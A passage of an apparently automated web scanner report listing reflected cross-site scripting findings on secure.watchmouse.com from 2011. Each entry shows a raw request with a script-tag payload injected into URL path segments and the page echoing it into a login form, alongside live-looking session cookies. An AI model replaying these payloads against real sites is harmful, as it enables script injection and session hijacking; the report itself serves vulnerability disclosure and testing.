GET /assets12604"><script>alert(1)</script>c91f43e7654/css/print.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b709bccab9ea05d574af943e7a235c28"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets12604"><script>alert(1)</script>c91f43e7654/css/print.css?20101008" method="post">
...[SNIP]...

1.184. https://secure.watchmouse.com/assets/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ec3a"><script>alert(1)</script>6198b6aec7f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css7ec3a"><script>alert(1)</script>6198b6aec7f/print.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-48967952e7d0bf43ad1488d7fa04691b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css7ec3a"><script>alert(1)</script>6198b6aec7f/print.css?20101008" method="post">
...[SNIP]...

1.185. https://secure.watchmouse.com/assets/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46990"><script>alert(1)</script>c906927119 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/print.css46990"><script>alert(1)</script>c906927119?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:28:01 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a39a891482e0b4031594c7cd351ff9e8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/print.css46990"><script>alert(1)</script>c906927119?20101008" method="post">
...[SNIP]...

1.186. https://secure.watchmouse.com/assets/css/screen.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1899"><script>alert(1)</script>9292e8d4d19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsb1899"><script>alert(1)</script>9292e8d4d19/css/screen.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2e997f334511fdf2e36cb56837870283"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsb1899"><script>alert(1)</script>9292e8d4d19/css/screen.css?20101008" method="post">
...[SNIP]...

1.187. https://secure.watchmouse.com/assets/css/screen.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd7a1"><script>alert(1)</script>4a32a0aeff2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/csscd7a1"><script>alert(1)</script>4a32a0aeff2/screen.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-0d602ff0d025210c10d46373c9443206"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/csscd7a1"><script>alert(1)</script>4a32a0aeff2/screen.css?20101008" method="post">
...[SNIP]...

1.188. https://secure.watchmouse.com/assets/css/screen.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76696"><script>alert(1)</script>d2c672cc1a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/screen.css76696"><script>alert(1)</script>d2c672cc1a3?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:28:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a6a9db497ce534dfac03ee7f70f1160a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/screen.css76696"><script>alert(1)</script>d2c672cc1a3?20101008" method="post">
...[SNIP]...

1.189. https://secure.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7113"><script>alert(1)</script>8fd9f18b0e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetse7113"><script>alert(1)</script>8fd9f18b0e5/js/easySlider1.7.packed.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a719c5a32ac6f62509546693647bb3bc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetse7113"><script>alert(1)</script>8fd9f18b0e5/js/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.190. https://secure.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e5a"><script>alert(1)</script>7fe40b63f2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsd6e5a"><script>alert(1)</script>7fe40b63f2f/easySlider1.7.packed.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d9ff333be7192466fbe19cd303747d84"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsd6e5a"><script>alert(1)</script>7fe40b63f2f/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.191. https://secure.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7295a"><script>alert(1)</script>48878346d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/easySlider1.7.packed.js7295a"><script>alert(1)</script>48878346d8 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-39440302d8e58bf2b4ef56ad2708fbfc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/easySlider1.7.packed.js7295a"><script>alert(1)</script>48878346d8" method="post">
...[SNIP]...

1.192. https://secure.watchmouse.com/assets/js/fancybox.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e39b6"><script>alert(1)</script>565ab6c49a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetse39b6"><script>alert(1)</script>565ab6c49a1/js/fancybox.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-75123fef12c6b34143ff6bb6a1de8ecb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetse39b6"><script>alert(1)</script>565ab6c49a1/js/fancybox.js" method="post">
...[SNIP]...

1.193. https://secure.watchmouse.com/assets/js/fancybox.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0f58"><script>alert(1)</script>480539fdded was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jse0f58"><script>alert(1)</script>480539fdded/fancybox.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-efb3db8d899f3cf6def5dffc50f7f162"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jse0f58"><script>alert(1)</script>480539fdded/fancybox.js" method="post">
...[SNIP]...

1.194. https://secure.watchmouse.com/assets/js/fancybox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd971"><script>alert(1)</script>53f2257d48d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/fancybox.jsfd971"><script>alert(1)</script>53f2257d48d HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
